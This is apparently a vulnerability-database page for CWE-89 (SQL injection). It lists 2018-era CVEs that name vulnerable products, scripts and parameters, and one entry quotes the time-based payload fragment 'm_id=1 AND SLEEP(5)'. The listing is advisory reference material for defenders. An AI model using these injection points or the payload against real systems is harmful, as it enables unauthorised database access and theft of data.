CWE-89
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Description
The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.
Hierarchy (View 1000)
Related attack patterns (CAPEC)
CAPEC-108 · CAPEC-109 · CAPEC-110 · CAPEC-470 · CAPEC-66 · CAPEC-7
CVEs mapped to this weakness (10,236)
page 37 of 512| CVE | Vendor / Product | Sev | Risk | CVSS | EPSS | KEV | Published | Description |
|---|---|---|---|---|---|---|---|---|
| CVE-2018-14968 | Cri | 0.64 | 9.8 | 0.01 | Aug 6, 2018 | An issue was discovered in EMLsoft 5.4.5. upload\eml\action\action.address.php has SQL Injection via the numPerPage parameter. | ||
| CVE-2018-14961 | Cri | 0.64 | 9.8 | 0.02 | Aug 6, 2018 | dl/dl_sendmail.php in zzcms 8.3 has SQL Injection via the sql parameter. | ||
| CVE-2018-5384 | Cri | 0.64 | 9.8 | 0.04 | Jul 24, 2018 | Navarino Infinity web interface up to version 2.2 exposes an unauthenticated script that is prone to blind sql injection. If successfully exploited the user can get info from the underlying postgresql database that could lead into to total compromise of the product. The said… | ||
| CVE-2017-3181 | Cri | 0.64 | 9.8 | 0.02 | Jul 24, 2018 | Multiple TIBCO Products are prone to multiple unspecified SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify… | ||
| CVE-2018-14515 | Cri | 0.64 | 9.8 | 0.02 | Jul 23, 2018 | A SQL injection was discovered in WUZHI CMS 4.1.0 that allows remote attackers to inject a malicious SQL statement via the index.php?m=promote&f=index&v=search keywords parameter. | ||
| CVE-2018-14501 | Cri | 0.64 | 9.8 | 0.01 | Jul 22, 2018 | manager/admin_ajax.php in joyplus-cms 1.6.0 has SQL Injection, as demonstrated by crafted POST data beginning with an "m_id=1 AND SLEEP(5)" substring. | ||
| CVE-2018-14440 | Cri | 0.64 | 9.8 | 0.01 | Jul 20, 2018 | An issue was discovered in cckevincyh SSH CompanyWebsite through 2018-05-03. SQL injection exists via the admin/noticeManageAction_queryNotice.action noticeInfo parameter. | ||
| CVE-2018-14389 | Cri | 0.64 | 9.8 | 0.01 | Jul 18, 2018 | joyplus-cms 1.6.0 has SQL Injection via the manager/admin_ajax.php val parameter. | ||
| CVE-2018-14066 | Cri | 0.64 | 9.8 | 0.00 | Jul 15, 2018 | The content://wappush content provider in com.android.provider.telephony, as found in some custom ROMs for Android phones, allows SQL injection. One consequence is that an application without the READ_SMS permission can read SMS messages. This affects Infinix X571 phones, as… | ||
| CVE-2018-14012 | Cri | 0.64 | 9.8 | 0.02 | Jul 12, 2018 | WolfSight CMS 3.2 allows SQL injection via the PATH_INFO to the default URI. | ||
| CVE-2018-10197 | Cri | 0.64 | 9.8 | 0.02 | Jul 11, 2018 | There is a time-based blind SQL injection vulnerability in the Access Manager component before 9.18.040 and 10.x before 10.18.040 in ELO ELOenterprise 9 and 10 and ELOprofessional 9 and 10 that makes it possible to read all database content. The vulnerability exists in the… | ||
| CVE-2018-13850 | — | Cri | 0.64 | 9.8 | 0.01 | Jul 10, 2018 | The "Firebase Cloud Messaging (FCM) + Advance Admin Panel" component supporting Firebase Push Notification on iOS (through 2017-10-26) allows SQL injection via the /advance_push/public/login username parameter. | |
| CVE-2013-3000 | Cri | 0.64 | 9.8 | 0.02 | Jul 9, 2018 | SQL injection vulnerability in IBM InfoSphere Data Replication Dashboard 9.7 and 10.1 allows remote attackers to execute arbitrary SQL commands via unspecified vectors. IBM X-Force ID: 84116. | ||
| CVE-2017-11088 | Cri | 0.64 | 9.8 | 0.01 | Jul 6, 2018 | Improper Input Validation in Linux io-prefetch in Snapdragon Mobile and Snapdragon Wear, A SQL injection vulnerability exists in versions MSM8909W, MSM8996AU, SD 210/SD 212/SD 205, SD 430, SD 450, SD 617, SD 625, SD 650/52, SD 820, SD 835, SD 845. | ||
| CVE-2018-13116 | Cri | 0.64 | 9.8 | 0.01 | Jul 3, 2018 | /user/del.php in zzcms 8.3 allows SQL injection via the tablename parameter after leveraging use of the zzcms_ask table. | ||
| CVE-2018-12630 | Cri | 0.64 | 9.8 | 0.02 | Jun 21, 2018 | NEWMARK (aka New Mark) NMCMS 2.1 allows SQL Injection via the sect_id parameter to the /catalog URI. | ||
| CVE-2015-4043 | Cri | 0.64 | 9.8 | 0.01 | Jun 19, 2018 | SQL injection vulnerability in ConnX ESP HR Management 4.4.0 allows remote attackers to execute arbitrary SQL commands via the ctl00$cphMainContent$txtUserName parameter to frmLogin.aspx. | ||
| CVE-2018-9029 | Cri | 0.64 | 9.8 | 0.02 | Jun 18, 2018 | An improper input validation vulnerability in CA Privileged Access Manager 2.x allows remote attackers to conduct SQL injection attacks. | ||
| CVE-2018-12534 | Cri | 0.64 | 9.8 | 0.01 | Jun 18, 2018 | A SQL injection issue was discovered in the Quick Chat plugin before 4.00 for WordPress. | ||
| CVE-2018-10997 | Cri | 0.64 | 9.8 | 0.02 | Jun 17, 2018 | Etere EtereWeb before 28.1.20 has a pre-authentication blind SQL injection in the POST parameters txUserName and txPassword. |
- risk 0.64cvss 9.8epss 0.01
An issue was discovered in EMLsoft 5.4.5. upload\eml\action\action.address.php has SQL Injection via the numPerPage parameter.
- risk 0.64cvss 9.8epss 0.02
dl/dl_sendmail.php in zzcms 8.3 has SQL Injection via the sql parameter.
- risk 0.64cvss 9.8epss 0.04
Navarino Infinity web interface up to version 2.2 exposes an unauthenticated script that is prone to blind sql injection. If successfully exploited the user can get info from the underlying postgresql database that could lead into to total compromise of the product. The said…
- risk 0.64cvss 9.8epss 0.02
Multiple TIBCO Products are prone to multiple unspecified SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify…
- risk 0.64cvss 9.8epss 0.02
A SQL injection was discovered in WUZHI CMS 4.1.0 that allows remote attackers to inject a malicious SQL statement via the index.php?m=promote&f=index&v=search keywords parameter.
- risk 0.64cvss 9.8epss 0.01
manager/admin_ajax.php in joyplus-cms 1.6.0 has SQL Injection, as demonstrated by crafted POST data beginning with an "m_id=1 AND SLEEP(5)" substring.
- risk 0.64cvss 9.8epss 0.01
An issue was discovered in cckevincyh SSH CompanyWebsite through 2018-05-03. SQL injection exists via the admin/noticeManageAction_queryNotice.action noticeInfo parameter.
- risk 0.64cvss 9.8epss 0.01
joyplus-cms 1.6.0 has SQL Injection via the manager/admin_ajax.php val parameter.
- risk 0.64cvss 9.8epss 0.00
The content://wappush content provider in com.android.provider.telephony, as found in some custom ROMs for Android phones, allows SQL injection. One consequence is that an application without the READ_SMS permission can read SMS messages. This affects Infinix X571 phones, as…
- risk 0.64cvss 9.8epss 0.02
WolfSight CMS 3.2 allows SQL injection via the PATH_INFO to the default URI.
- risk 0.64cvss 9.8epss 0.02
There is a time-based blind SQL injection vulnerability in the Access Manager component before 9.18.040 and 10.x before 10.18.040 in ELO ELOenterprise 9 and 10 and ELOprofessional 9 and 10 that makes it possible to read all database content. The vulnerability exists in the…
- risk 0.64cvss 9.8epss 0.01
The "Firebase Cloud Messaging (FCM) + Advance Admin Panel" component supporting Firebase Push Notification on iOS (through 2017-10-26) allows SQL injection via the /advance_push/public/login username parameter.
- risk 0.64cvss 9.8epss 0.02
SQL injection vulnerability in IBM InfoSphere Data Replication Dashboard 9.7 and 10.1 allows remote attackers to execute arbitrary SQL commands via unspecified vectors. IBM X-Force ID: 84116.
- risk 0.64cvss 9.8epss 0.01
Improper Input Validation in Linux io-prefetch in Snapdragon Mobile and Snapdragon Wear, A SQL injection vulnerability exists in versions MSM8909W, MSM8996AU, SD 210/SD 212/SD 205, SD 430, SD 450, SD 617, SD 625, SD 650/52, SD 820, SD 835, SD 845.
- risk 0.64cvss 9.8epss 0.01
/user/del.php in zzcms 8.3 allows SQL injection via the tablename parameter after leveraging use of the zzcms_ask table.
- risk 0.64cvss 9.8epss 0.02
NEWMARK (aka New Mark) NMCMS 2.1 allows SQL Injection via the sect_id parameter to the /catalog URI.
- risk 0.64cvss 9.8epss 0.01
SQL injection vulnerability in ConnX ESP HR Management 4.4.0 allows remote attackers to execute arbitrary SQL commands via the ctl00$cphMainContent$txtUserName parameter to frmLogin.aspx.
- risk 0.64cvss 9.8epss 0.02
An improper input validation vulnerability in CA Privileged Access Manager 2.x allows remote attackers to conduct SQL injection attacks.
- risk 0.64cvss 9.8epss 0.01
A SQL injection issue was discovered in the Quick Chat plugin before 4.00 for WordPress.
- risk 0.64cvss 9.8epss 0.02
Etere EtereWeb before 28.1.20 has a pre-authentication blind SQL injection in the POST parameters txUserName and txPassword.